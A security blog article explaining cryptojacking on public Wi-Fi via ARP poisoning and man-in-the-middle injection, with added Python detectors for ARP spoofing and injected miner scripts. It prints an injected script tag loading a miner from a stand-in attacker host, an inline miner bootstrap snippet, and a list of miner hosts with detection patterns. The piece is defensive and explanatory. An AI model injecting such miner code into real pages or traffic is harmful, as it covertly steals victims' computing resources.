General security

Malicious Cryptominer in Wireless Networks

Pedro Tavares
March 23, 2018

Introduction

Cyber attackers are leveraging covert and malicious ways to produce digital money — often using Crypto miners. This technique is known as "Crypto jacking."

Crypto jacking is the secret use of a victim's processing power to mine cryptocurrency. It can lead to security breaches and can consume much of the computing resources that are available. For instance, IT systems can freeze, personal data can be lost, and gaps can be created that other Cyber attackers can further exploit.


In the past, Crypto jacking was carried out through drive-by malicious schemes: the victim unknowingly installed malware that secretly mined cryptocurrency. Now, in-browser Crypto jacking has become the new trend. For example, a piece of JavaScript code is injected into a web page to mine digital cash. Because JavaScript runs on almost every website, the code responsible for in-browser mining does not need to be installed. As a result, there is no quick way to determine whether a web page has a hidden mining component attached to it.

Crypto jacking via ARP Poisoning

This kind of Cyberattack works by applying computer processing resources to solving complex mathematical puzzles (known as the "Challenge"). The more processing power that is used, the more cryptocurrency the Cyber attacker collects through mining. Unfortunately, public Wi-Fi networks are abused in this mining process as well, because they are not monitored.

A perfect example of this is the Starbucks Coffee chain located in Buenos Aires, Argentina. In December 2017, the public Wi-Fi networks at these coffee shops were secretly using visitors' computers and smartphones to mine cryptocurrency.

Address Resolution Protocol (ARP) Poisoning attacks have been used to manipulate users' traffic and make their devices mine cryptocurrency. This is done by adding a piece of malicious code to the web pages in transit. In this scenario, the Cyber attacker floods a target's ARP cache with forged entries (this is also known as "Poisoning"). The technique uses a Man-in-the-Middle position to poison the network.

How it Works

All requested web pages are infected with a snippet of code — this is the malicious Crypto miner. For this to happen, the Cyber attacker's computer is placed in the middle of the communication line, between the router and the users' computers. The figure below illustrates how this process works:

In the first stage, the Cyber attacker sends spoofed ARP messages on the Wi-Fi network, and as a result the attacker's MAC address becomes associated with the default gateway's IP address. All network traffic destined for the Wi-Fi router therefore passes through the Cyber attacker first — who is now the Man-In-the-Middle.
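The first stage leaves a footprint a defender can watch for: an IP-to-MAC binding that changes, and one MAC that suddenly answers for the gateway and for other hosts at the same time. The detector below is an added example in Python, not code from the original article; the ARP replies and every address in it are constructed placeholders.

```python
"""ARP-poisoning detector over a stream of ARP replies.

Added example, not from the original article. The replies below are
constructed, and every address is a placeholder.
"""
from dataclasses import dataclass, field


@dataclass
class ArpMonitor:
    gateway_ip: str
    trusted: dict = field(default_factory=dict)  # ip -> MAC first seen
    current: dict = field(default_factory=dict)  # ip -> MAC last claimed

    def observe(self, sender_ip: str, sender_mac: str) -> list:
        """Record one ARP reply and return alerts (empty when benign)."""
        sender_mac = sender_mac.lower()
        alerts = []
        trusted = self.trusted.setdefault(sender_ip, sender_mac)
        if trusted != sender_mac:
            tag = "GATEWAY " if sender_ip == self.gateway_ip else ""
            alerts.append(f"{tag}{sender_ip} moved {trusted} -> {sender_mac}")
        self.current[sender_ip] = sender_mac
        # One MAC answering for the gateway and for another host at the
        # same time is the footprint of the man-in-the-middle position.
        claimed = sorted(ip for ip, mac in self.current.items()
                         if mac == sender_mac)
        if self.gateway_ip in claimed and len(claimed) > 1:
            alerts.append(f"MITM {sender_mac} answers for {claimed}")
        return alerts


def detect(gateway_ip: str, replies: list) -> list:
    """Run the monitor over (sender_ip, sender_mac) tuples in order."""
    monitor = ArpMonitor(gateway_ip)
    found = []
    for ip, mac in replies:
        found.extend(monitor.observe(ip, mac))
    return found


# Constructed replies: the real gateway, a client, the attacker's own host,
# then the attacker re-announcing the gateway IP and the client IP as its MAC.
SAMPLE_REPLIES = [
    ("192.168.1.1", "aa:aa:aa:aa:aa:01"),
    ("192.168.1.20", "bb:bb:bb:bb:bb:20"),
    ("192.168.1.50", "cc:cc:cc:cc:cc:50"),
    ("192.168.1.1", "cc:cc:cc:cc:cc:50"),
    ("192.168.1.20", "cc:cc:cc:cc:cc:50"),
]
```

Feeding real ARP replies (for example from a packet capture) through detect() in arrival order yields the same two alert kinds; a static ARP entry for the gateway is the usual mitigation once the pattern is confirmed.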

Positioned in this "sweet spot" on the network, the Cyber attacker can now actively intercept, analyze and change the public Wi-Fi traffic. The mitmproxy tool can also act as an active Man-In-the-Middle and inject a snippet of code into the web server requests. This line of code is a script tag that loads the miner, and is illustrated below:

...
<script src="man-in-the-middle-IP/crypto-jacking.js"></script>
...

Example of a malicious cryptominer embedded in a Wi-Fi request.

The Cyber attacker can use a Crypto miner that runs on a local computer as well as other online APIs such as CoinHive and Crypto-Loot to mine the Cryptocurrency.

The Monero Cryptocurrency has gained a new role in Crypto jacking. It was officially launched in 2014, and it is designed to be used covertly on individual computers. To make this possible, Monero mining tools have recently been put into circulation. They can be easily added to websites and run on unsuspecting computers to carry out the Cryptomining.

A snippet of code from CoinHive is illustrated below:

<script>
<!-- CRLT is the namespace of the Crypto-Loot embed; the CoinHive embed
     follows the same pattern with CoinHive.Anonymous(...) -->
var miner = new CRLT.Anonymous('YOUR_SITE_PUBLIC_KEY');
miner.start();
</script>
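Both injection shapes on this page, a script tag that loads a miner from an address that is not the site's origin and an inline Anonymous(...).start() bootstrap, can be flagged by scanning the HTML that reaches the browser. The scanner below is an added example in Python, not code from the original article or from either mining service; SAMPLE_PAGE and the 203.0.113.7 host are constructed.

```python
"""Scan an HTML body for the in-browser miner patterns shown above.

Added example, not from the original article. SAMPLE_PAGE is constructed;
203.0.113.7 is a documentation placeholder standing in for the MITM host.
"""
import re
from urllib.parse import urlparse

# Loader hosts of the two services named in the article, and the API
# namespaces their embed code uses (CoinHive.Anonymous / CRLT.Anonymous).
MINER_HOSTS = ("coinhive.com", "crypto-loot.com")
MINER_API = re.compile(r"\b(?:CoinHive|CRLT)\.Anonymous\s*\(")
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
INLINE_JS = re.compile(r"<script(?![^>]*\ssrc)[^>]*>(.*?)</script>", re.I | re.S)
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def scan_html(body: str, page_host: str) -> list:
    """Return findings for script tags that look like an injected miner."""
    findings = []
    for src in SCRIPT_SRC.findall(body):
        ref = src if "//" in src else "//" + src   # tolerate scheme-less src
        host = urlparse(ref).hostname or ""
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            findings.append(f"known miner loader: {src}")
        elif IPV4_HOST.match(host) and host != page_host:
            # A script pulled from a bare IP rather than the site's origin is
            # the injection shape shown above (man-in-the-middle-IP/...).
            findings.append(f"script from bare IP host: {src}")
    for code in INLINE_JS.findall(body):
        if MINER_API.search(code) and re.search(r"\.start\s*\(", code):
            findings.append("inline miner bootstrap: Anonymous(...).start()")
    return findings


SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="http://203.0.113.7/crypto-jacking.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<script>
var miner = new CRLT.Anonymous('SITE_KEY_PLACEHOLDER');
miner.start();
</script>
</body></html>"""
```

The same checks can run inside a proxy or a browser extension; the bare-IP rule is the one that catches the Wi-Fi injection case even when the loader host is not on any blocklist.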

Identifying and mitigating the risks of Crypto jacking is a very cumbersome and tedious task. Because public Wi-Fi networks are not being monitored in real time, they have become the prime venue for the Cyber attacker in which to trigger such events.

Conclusion

With Cybercrime on the rise, Crypto jacking has become one of the latest threats, allowing hackers to obtain money in a very covert and easy way. As a result, it is difficult to fight against this kind of malicious activity.

To combat this threat, an end user can install various web-browser extensions that block in-browser Cryptomining attacks. An example of this is No Coin, a Chrome extension developed by Rafael Keramidas. It blocks CoinHive mining and also adds an extra layer of protection against other forms of Crypto jacking.


Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and a Security Evangelist. He is also Editor-in-Chief of the computer security blog seguranca-informatica.pt.

In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a Freelance Writer.